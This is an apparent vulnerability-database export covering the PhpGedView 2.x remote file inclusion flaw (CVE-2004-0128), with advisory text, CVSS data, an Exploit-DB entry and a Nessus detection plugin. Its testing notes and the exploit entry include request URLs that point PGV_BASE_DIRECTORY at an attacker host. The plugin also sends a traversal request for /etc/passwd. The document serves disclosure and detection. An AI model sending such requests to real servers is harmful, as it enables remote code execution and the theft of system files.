{"type": "osvdb", "published": "2004-01-29T05:36:45", "href": "https://vulners.com/osvdb/OSVDB:3769", "bulletinFamily": "software", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/", "score": 7.5}, "viewCount": 20, "edition": 1, "reporter": "OSVDB", "title": "PhpGedView PGV_BASE_DIRECTORY Arbitrary Command Execution", "affectedSoftware": [{"operator": "eq", "version": "2.61", "name": "PhpGedView"}, {"operator": "eq", "version": "2.65", "name": "PhpGedView"}, {"operator": "eq", "version": "2.61.1", "name": "PhpGedView"}, {"operator": "eq", "version": "2.65.1", "name": "PhpGedView"}, {"operator": "eq", "version": "2.60", "name": "PhpGedView"}], "enchantments": {"score": {"value": 7.3, "vector": "NONE", "modified": "2017-04-28T13:19:58", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2004-0128"]}, {"type": "exploitdb", "idList": ["EDB-ID:23617"]}, {"type": "nessus", "idList": ["PHPGEDVIEW_DIRECTORY_TRAVERSAL.NASL"]}], "modified": "2017-04-28T13:19:58", "rev": 2}, "vulnersScore": 7.3}, "references": [], "id": "OSVDB:3769", "lastseen": "2017-04-28T13:19:58", "cvelist": ["CVE-2004-0128"], "modified": "2004-01-29T05:36:45", "description": "## Vulnerability Description\nPhpGedView contains a flaw that may allow a malicious user to execute arbitrary code. The issue is triggered because remote users may influence the 'PGV_BASE_DIRECTORY' variable in the [GED_File]_conf.php module, which specifies an include path. It is possible that the flaw may allow an attacker to execute arbitrary code resulting in a loss of confidentiality, integrity, and/or availability.\n## Solution Description\nUpgrade to version 2.65.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nPhpGedView contains a flaw that may allow a malicious user to execute arbitrary code. The issue is triggered because remote users may influence the 'PGV_BASE_DIRECTORY' variable in the [GED_File]_conf.php module, which specifies an include path. It is possible that the flaw may allow an attacker to execute arbitrary code resulting in a loss of confidentiality, integrity, and/or availability.\n## Manual Testing Notes\nIn this case you have to obtain the name of the GEDCOM File used. Just perform\na http://[target]/session.php request the GEDCOM file will be in argument of the\nlogin.php call.\n\nhttp://[victim]/[phpGedView-directory]/index/[GED_File]_conf.php?PGV_BASE_DIRECTORY=http://[attacker]&THEME_DIR=/\n## References:\nVendor URL: http://sourceforge.net/project/showfiles.php?group_id=55456&package_id=61562&release_id=141517\nVendor URL: http://phpgedview.sourceforge.net/\n[Secunia Advisory ID:10753](https://secuniaresearch.flexerasoftware.com/advisories/10753/)\n[Related OSVDB ID: 3768](https://vulners.com/osvdb/OSVDB:3768)\nOther Advisory URL: http://www.netvigilance.com/advisory0002\nOther Advisory URL: http://www.securityfocus.com/archive/1/352355\nKeyword: TC 17868\nKeyword: netVigilance Security Advisory 2\n[CVE-2004-0128](https://vulners.com/cve/CVE-2004-0128)\nBugtraq ID: 9531\n"}

{"cve": [{"lastseen": "2020-10-03T11:33:38", "description": "PHP remote file inclusion vulnerability in the GEDCOM configuration script for phpGedView 2.65.1 and earlier allows remote attackers to execute arbitrary PHP code by modifying the PGV_BASE_DIRECTORY parameter to reference a URL on a remote web server that contains a malicious theme.php script.", "edition": 3, "cvss3": {}, "published": "2004-03-03T05:00:00", "title": "CVE-2004-0128", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-0128"], "modified": "2017-10-10T01:30:00", "cpe": ["cpe:/a:phpgedview:phpgedview:2.65", "cpe:/a:phpgedview:phpgedview:2.65.1", "cpe:/a:phpgedview:phpgedview:2.52.3", "cpe:/a:phpgedview:phpgedview:2.60", "cpe:/a:phpgedview:phpgedview:2.61.1", "cpe:/a:phpgedview:phpgedview:2.61"], "id": "CVE-2004-0128", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0128", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:phpgedview:phpgedview:2.52.3:*:*:*:*:*:*:*", "cpe:2.3:a:phpgedview:phpgedview:2.65:*:*:*:*:*:*:*", "cpe:2.3:a:phpgedview:phpgedview:2.65.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpgedview:phpgedview:2.60:*:*:*:*:*:*:*", "cpe:2.3:a:phpgedview:phpgedview:2.61:*:*:*:*:*:*:*", "cpe:2.3:a:phpgedview:phpgedview:2.61.1:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-02-02T21:24:28", "description": "PhpGedView 2.x [GED_File]_conf.php Remote File Include Vulnerability. CVE-2004-0128. Webapps exploit for php platform", "published": "2004-01-30T00:00:00", "type": "exploitdb", "title": "PhpGedView 2.x - GED_File_conf.php Remote File Include Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-0128"], "modified": "2004-01-30T00:00:00", "id": "EDB-ID:23617", "href": "https://www.exploit-db.com/exploits/23617/", "sourceData": "source: http://www.securityfocus.com/bid/9531/info\r\n\r\nIt has been reported that PhpGedView may be prone to a remote file include vulnerability that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable system. The problem reportedly exists because remote users may influence the 'PGV_BASE_DIRECTORY' variable in the [GED_File]_conf.php module, which specifies an include path.\r\n\r\nPhpGedView versions 2.65.1 and prior have been reported to be prone to this issue.\r\n\r\nhttp://www.example.com/[phpGedView-directory]/index/[GED_File]_conf.php?PGV_BASE_DIRECTORY=http://attacker&THEME_DIR=/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/23617/"}], "nessus": [{"lastseen": "2021-01-01T04:54:57", "description": "A vulnerability exists in the installed version of PhpGedView that\nmay allow an attacker to read arbitrary files on the remote web\nserver with the privileges of the web user.\n\nAnother vulnerability could allow an attacker to include arbitrary\nPHP files hosted on a third-party website.", "edition": 23, "published": "2004-02-02T00:00:00", "title": "phpGedView Arbitrary File Access / Remote File Inclusion", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0128", "CVE-2004-0127"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:phpgedview:phpgedview"], "id": "PHPGEDVIEW_DIRECTORY_TRAVERSAL.NASL", "href": "https://www.tenable.com/plugins/nessus/12034", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(12034);\n script_version(\"1.25\");\n script_cvs_date(\"Date: 2018/07/24 18:56:11\");\n\n script_cve_id(\"CVE-2004-0127\", \"CVE-2004-0128\");\n script_bugtraq_id(9529, 9531);\n\n script_name(english:\"phpGedView Arbitrary File Access / Remote File Inclusion\");\n script_summary(english:\"Tries to read a local file\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"A remote web application is affected by several flaws.\");\n script_set_attribute(attribute:\"description\", value:\n\"A vulnerability exists in the installed version of PhpGedView that\nmay allow an attacker to read arbitrary files on the remote web\nserver with the privileges of the web user.\n\nAnother vulnerability could allow an attacker to include arbitrary\nPHP files hosted on a third-party website.\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.netvigilance.com/advisory0003\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to PhpGedView 2.65.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/01/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/02/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:phpgedview:phpgedview\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_copyright(english:\"This script is Copyright (C) 2004-2018 Tenable Network Security, Inc.\");\n script_family(english:\"CGI abuses\");\n\n script_dependencies(\"phpgedview_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_keys(\"www/PHP\", \"www/phpgedview\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\n#\n# The script code starts here\n#\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\n\nport = get_http_port(default:80, php:TRUE, embedded:FALSE);\n\n# Test an install.\ninstall = get_install_from_kb(appname:'phpgedview', port:port, exit_on_fail:TRUE);\ndir = install['dir'];\n\n\nu = strcat(dir,\"/editconfig_gedcom.php?gedcom_config=../../../../../../../../../../etc/passwd\");\nr = http_send_recv3(method: \"GET\", item: u, port:port, exit_on_fail:TRUE);\n\nbuf = strcat(r[0], r[1], '\\r\\n', r[2]);\nif (egrep(pattern:\"root:.*:0:[01]:\", string:buf)){\n security_hole(port);\n exit(0);\n}\nelse exit(0, \"The PhpGedView install at \"+build_url(port:port, qs:dir+'/')+\" is not affected.\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}